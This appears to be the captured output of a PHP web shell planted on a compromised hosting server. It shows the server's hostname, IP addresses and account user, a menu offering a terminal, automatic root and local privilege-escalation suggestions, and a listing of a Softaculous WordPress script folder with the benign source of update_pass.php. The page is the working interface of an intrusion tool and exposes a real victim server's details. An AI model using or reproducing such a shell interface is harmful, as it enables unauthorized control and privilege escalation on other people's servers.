Linux sea-business-23.hostwindsdns.com 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64
LiteSpeed
Server IP : 104.168.155.189 & Your IP : 216.73.217.84
Domains :
Cant Read [ /etc/named.conf ]
User : zvmcccat
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
wp69 /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-08-10 10:14
languages
[ DIR ]
drwxr-xr-x
2026-08-10 10:14
php53
[ DIR ]
drwxr-xr-x
2026-08-10 10:14
php56
[ DIR ]
drwxr-xr-x
2026-08-10 10:14
php71
[ DIR ]
drwxr-xr-x
2026-08-10 10:14
php81
[ DIR ]
drwxr-xr-x
2026-08-10 10:14
php82
[ DIR ]
drwxr-xr-x
2026-08-10 10:14
plugins
[ DIR ]
drwxr-xr-x
2026-08-10 10:14
.htaccess
482
B
-rw-r--r--
2026-05-21 15:01
_htaccess
553
B
-rw-r--r--
2026-05-21 15:01
_index.php
59
B
-rw-r--r--
2026-05-21 15:01
_wp-config.php
3.39
KB
-rw-r--r--
2026-05-21 15:01
add_user.php
461
B
-rw-r--r--
2026-05-21 15:01
backup.php
3.02
KB
-rw-r--r--
2026-08-10 09:55
check_charset.php
2.02
KB
-rw-r--r--
2026-05-21 15:01
clone.php
32.16
KB
-rw-r--r--
2026-08-10 09:55
clone.xml
497
B
-rw-r--r--
2026-05-21 15:01
edit.php
10.37
KB
-rw-r--r--
2026-08-10 09:55
edit.xml
2.2
KB
-rw-r--r--
2026-05-21 15:01
extend.php
101.52
KB
-rw-r--r--
2026-08-10 09:55
fileindex.php
291
B
-rw-r--r--
2026-05-21 15:01
import.php
6.54
KB
-rw-r--r--
2026-08-10 09:55
info.xml
15.95
KB
-rw-r--r--
2026-08-10 09:53
install.js
4.2
KB
-rw-r--r--
2026-05-21 15:01
install.php
32.42
KB
-rw-r--r--
2026-08-10 09:55
install.xml
11.13
KB
-rw-r--r--
2026-05-21 15:01
md5
4.92
KB
-rw-r--r--
2026-08-10 09:55
notes.txt
6.39
KB
-rw-r--r--
2026-08-10 09:53
plugin_activate.php
596
B
-rw-r--r--
2026-05-21 15:01
plugin_deactivate.php
613
B
-rw-r--r--
2026-05-21 15:01
sign_on.php
3.28
KB
-rw-r--r--
2026-05-21 15:01
soft.htaccess
127
B
-rw-r--r--
2026-05-21 15:01
update_pass.php
639
B
-rw-r--r--
2026-05-21 15:01
upgrade.php
15.16
KB
-rw-r--r--
2026-08-10 09:55
upgrade.xml
2.05
KB
-rw-r--r--
2026-05-21 15:01
wp-config.php
3.11
KB
-rw-r--r--
2026-05-21 15:01
Save
Rename
<?php /** * A Compatibility library with PHP 5.5's simplified password hashing API. * * @author Anthony Ferrara <ircmaxell@php.net> * @license http://www.opensource.org/licenses/mit-license.html MIT License * @copyright 2012 The Authors */ @unlink('update_pass.php'); if(!defined('PASSWORD_BCRYPT')){ define('PASSWORD_BCRYPT', 1); } if(!defined('PASSWORD_DEFAULT')){ define('PASSWORD_DEFAULT', PASSWORD_BCRYPT); } $password_to_hash = base64_encode( hash_hmac( 'sha384', '[[admin_pass]]', 'wp-sha384', true ) ); $resp = password_hash($password_to_hash, PASSWORD_BCRYPT); echo '<update_pass>'.'$wp' . $resp.'</update_pass>'; ?>